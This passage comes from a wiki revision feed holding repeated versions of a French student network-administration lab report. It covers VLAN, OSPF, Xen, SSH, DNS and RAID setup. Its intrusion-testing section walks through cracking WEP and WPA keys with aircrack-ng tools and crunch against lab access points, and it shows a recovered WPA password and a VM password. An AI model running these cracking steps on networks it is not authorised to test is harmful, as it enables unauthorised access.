                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On l'ajoute au fichier /etc/fstab pour qu'il soit monté à chaque démarrage de la vm :&lt;br /&gt;
&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57683</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57683"/>
				<updated>2022-01-10T15:50:57Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
&lt;br /&gt;
On vérifie que la configuration est cohérente à l'aide de &lt;br /&gt;
 named-checkzone anosteke59.site /etc/bind/db.anosteke59.site &lt;br /&gt;
&lt;br /&gt;
On vérifie ensuite que le DNS fonctionne avec NSLOOKUP (Installer dnsutils sur la vm)&lt;br /&gt;
 nslookup anosteke59.site &lt;br /&gt;
 dig anosteke59.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de site par certificat ===&lt;br /&gt;
On crée une demande de certificat avec la commande : &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout anosteke59.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
le fichier CSR doit alors être envoyé à gandi pour créer notre certificat. &lt;br /&gt;
Pour lancer la création de notre certificat on doit ajouter une entrée dans notre zone DNS. On attends ensuite le retour du certificat de gandi.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
Sur le serveur Xen, on créer nos volumes. &lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-1 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-2 storage&lt;br /&gt;
 lvcreate -L1G -nAnosteke-raid-3 storage&lt;br /&gt;
&lt;br /&gt;
Qu'on ajoute à la configuration de notre VM&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/Anosteke-raid-3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
Après un rédémarrage de la VM on execute &lt;br /&gt;
&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
=== Tests d’intrusion ===&lt;br /&gt;
&lt;br /&gt;
== WEP ==&lt;br /&gt;
On commence par casser la clé WEP.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
puis on lance &lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
3 représente la channel utilisée par l'ap (ici 3)&lt;br /&gt;
&lt;br /&gt;
Notre interface est renommée 'wlan0mon'.&lt;br /&gt;
Pour visualiser les paquets sniffés, on execute alors&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On observe plusieurs emetteurs, avec leur BSSID associé. On choisit d'attaquer cracotte07 dont le BSSID est 04:DA:D2:9C:50:56 On lance alors la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -w dump -c 4 --bssid 04:DA:D2:9C:50:56 wlan0mon&lt;br /&gt;
&lt;br /&gt;
Après quelques minutes, on execute :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng dump*.cap&lt;br /&gt;
&lt;br /&gt;
Si le programme a accumulé suffisamment de vecteurs d'initialisation (IVs), la clé WEP est cassée.&lt;br /&gt;
&lt;br /&gt;
== WPA ==&lt;br /&gt;
&lt;br /&gt;
On casse à présent la clé WPA. On scanne la bande de fréquence 9 :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID de kracotte07 : 44:AD:D9:5F:87:03 On récupère ensuite des handshakes avec la commande :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 9 --bssid 44:AD:D9:5F:87:03 -w dumpWPA wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise ensuite crunch pour générer la liste des mots de passe de 8 chiffres que l'on utilisera pour cracker la clé :&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Enfin, on lance la commande :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:03 dumpWPA.cap&lt;br /&gt;
&lt;br /&gt;
Le processus peut prendre plusieurs heures. On obtient le mot de passe suivant : 59904999&lt;br /&gt;
&lt;br /&gt;
== Intrusion sur un serveur d’application Web ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
=== Inspection ARP par un élément réseau ===&lt;br /&gt;
===  Sécurisation WiFi par WPA2-EAP ===&lt;/div&gt;</summary>
		<author><name>Avercaem</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57682</id>
		<title>TP sysres IMA5 2021/2022 G7</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G7&amp;diff=57682"/>
				<updated>2022-01-10T15:50:14Z</updated>
		
		<summary type="html">&lt;p&gt;Avercaem : /* Sécurisation de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
= PRA 2021-2022 Arthur Vercaemst - Johnny Gouvaert =&lt;br /&gt;
&lt;br /&gt;
==Répartition travail==&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
=== Configuration IPV4 ===&lt;br /&gt;
&lt;br /&gt;
==== Paramétrage des VLANs ====&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
Nous avons pris la tache de configurer le routeur cisco 9200 de la salle E-306&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé le VLAN 42. Ce VLAN permet l'accès au routeur 9200 depuis les VMs&lt;br /&gt;
Il est donc connecté au port TenGigabitethernet1/1/2 (10G) sur lequel est branchée un fibre venant du serveur capbreton.&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
   conf t&lt;br /&gt;
     vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     int vlan 42&lt;br /&gt;
       no shut&lt;br /&gt;
       ip address 193.48.57.188  255.255.255.192&lt;br /&gt;
       ipv6 enable&lt;br /&gt;
       ipv6 address 2001:7A8:116E:60B0::F1/64 eui-64&lt;br /&gt;
       exit&lt;br /&gt;
     int TenGigabitethernet1/1/2&lt;br /&gt;
       no shut&lt;br /&gt;
       switchport mode access&lt;br /&gt;
       switchport access vlan 42&lt;br /&gt;
       exit&lt;br /&gt;
     exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé et configuré le VLAN 531. Ce vlan est relié par fibre au routeur de l'ecole pour l'accès internet&lt;br /&gt;
&lt;br /&gt;
 enable&lt;br /&gt;
  conf t&lt;br /&gt;
    vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    int vlan 531&lt;br /&gt;
      no shut&lt;br /&gt;
      ip address 192.168.222.42 255.255.255.248&lt;br /&gt;
      exit&lt;br /&gt;
    int TenGigabitethernet1/1/1&lt;br /&gt;
      no shut&lt;br /&gt;
      switchport mode access&lt;br /&gt;
      switchport access vlan 531&lt;br /&gt;
      exit&lt;br /&gt;
    exit&lt;br /&gt;
  write&lt;br /&gt;
&lt;br /&gt;
==== OPSF ====&lt;br /&gt;
OSPF (Open Shortest Path First) à chaque routeur de partager sa connaissance de la topologie du réseau, de cette manière on rends possible un routage plus dynamique sur notre infrastructure.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                                                                                                                    &lt;br /&gt;
 router-id 10.00.0.1                                   &lt;br /&gt;
 log-adjacency-changes                                                                                  &lt;br /&gt;
 summary-address 193.48.57.176 255.255.255.240                                                                                                         &lt;br /&gt;
 summary-address 100.64.0.0 255.240.0.0 not-advertise  &lt;br /&gt;
 summary-address 10.0.0.0 255.0.0.0 not-advertise                                                                                                    &lt;br /&gt;
 redistribute connected subnets                       &lt;br /&gt;
 redistribute static subnets                                                                                                                         &lt;br /&gt;
 network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation ==&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Après problème dû au l'utilisation de la commande su au lieux de su - nous avons créé notre image de notre VM&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=Anosteke --ip=193.48.57.182 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=pasglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les 2 disques virtuels &lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n Anosteke1 storage&lt;br /&gt;
 lvcreate -L10G -n Anosteke2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les formatons&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Anosteke2&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les 2 disques au fichier de configuration de notre VM &lt;br /&gt;
&lt;br /&gt;
 nano /etc/xen/Anosteke.cfg&lt;br /&gt;
 disk        = [&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/disk.img,xvda2,w',&lt;br /&gt;
                 'file:/usr/local/xen/domains/Bellerose/swap.img,xvda1,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke1,xvda3,w',&lt;br /&gt;
                 'phy:/dev/storage/Anosteke2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 vif         = [ 'ip=193.48.57.182 ,mac=00:16:3E:AA:F5:2B ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
On peut ensuite démarrer notre VM&lt;br /&gt;
&lt;br /&gt;
 xl create -c /etc/xen/AnosTeke.cfg&lt;br /&gt;
&lt;br /&gt;
Pour enfin configurer nos espaces disque, en commençant par créer et monter nos espaces&lt;br /&gt;
&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour finaliser le montage des espaces, on modifie le fichier /etc/fstab pour y ajouter nos emplacements&lt;br /&gt;
&lt;br /&gt;
 /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
On les configure DUMP disabled et Fsck 2.&lt;br /&gt;
On peut finalement lancer le MOUNT&lt;br /&gt;
&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
et vérifier la bonne execution&lt;br /&gt;
 lsblk&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
sur le serveur nous pouvons vérifier que notre machine existe : &lt;br /&gt;
 xen-list-images | grep Name: %nom de la vm%&lt;br /&gt;
 lsblk | grep %nom de la vm%&lt;br /&gt;
et finalement pour lister les machines en fonctionnement&lt;br /&gt;
 xen list&lt;br /&gt;
&lt;br /&gt;
On peut ensuite se connecter à la machine&lt;br /&gt;
 xen console Anosteke&lt;br /&gt;
&lt;br /&gt;
On en profite pour ajouter un nouvel utilisateur&lt;br /&gt;
 sudo adduser pifou&lt;br /&gt;
&lt;br /&gt;
Et installer les paquets&lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get upgrade&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
On vérifie que OpenSSH est installé &lt;br /&gt;
 ssh -V&lt;br /&gt;
&lt;br /&gt;
Si il ne l'est pas on l'install. &lt;br /&gt;
 sudo apt install openssh-server&lt;br /&gt;
&lt;br /&gt;
Pour lancer et arreter le service SSH : &lt;br /&gt;
 sudo service ssh stop&lt;br /&gt;
 sudo service ssh start&lt;br /&gt;
&lt;br /&gt;
Pour desactiver le service : &lt;br /&gt;
 sudo systemctl disable ssh&lt;br /&gt;
&lt;br /&gt;
Pour connaitre l'état du service : &lt;br /&gt;
 sudo systemctl status ssh&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite configurer ssh dans le fichier etc/ssh/sshd_config&lt;br /&gt;
 /etc/ssh&lt;br /&gt;
 ├── ssh_config&lt;br /&gt;
 ├── sshd_config&lt;br /&gt;
 ├── ssh_host_rsa_key&lt;br /&gt;
 └── ssh_host_rsa_key.pub&lt;br /&gt;
&lt;br /&gt;
Dans ce fichier on modifie les paramètres suivants : &lt;br /&gt;
 Port 22&lt;br /&gt;
 LogLevel VERBOSE&lt;br /&gt;
 PermitRootLogin no&lt;br /&gt;
 Banner /etc/ssh/banner&lt;br /&gt;
&lt;br /&gt;
On redemarre ensuite le service SSH&lt;br /&gt;
 systemctl reaload ssh.service&lt;br /&gt;
&lt;br /&gt;
=== Serveur DNS ===&lt;br /&gt;
On associe notre IP au nom de domaine depuis l'interface du fournisseur Gandi.Net&lt;br /&gt;
&lt;br /&gt;
On install :&lt;br /&gt;
 apt-get install bind9&lt;br /&gt;
On peut aussi installer le paquet dsnutils pour débugger le service DNS &lt;br /&gt;
&lt;br /&gt;
Configuration du fichier /etc/bind/named.conf.options&lt;br /&gt;
 listen-on {any;};&lt;br /&gt;
 //allow-recursion  {localhost;};&lt;br /&gt;
&lt;br /&gt;
On configure ensuite le bind de notre nom de domaine.&lt;br /&gt;
 /etc/bind/db.anosteke59.site                        &lt;br /&gt;
 $TTL 1H&lt;br /&gt;
 @       IN      SOA     ns.anosteke59.site (&lt;br /&gt;
                         12      ; serial number YYMMDDNN&lt;br /&gt;
                         1H           ; Refresh&lt;br /&gt;
                         1H            ; Retry&lt;br /&gt;
                         1D          ; Expire&lt;br /&gt;
                         1H           ; Min TTL&lt;br /&gt;
                         )&lt;br /&gt;
          IN      NS      ns.anosteke59.site.&lt;br /&gt;
          IN      NS      ns6.gandi.net. &lt;br /&gt;
 www      IN      A       193.48.57.182&lt;br /&gt;
 ns       IN      CNAME   WWW&lt;br /&gt;
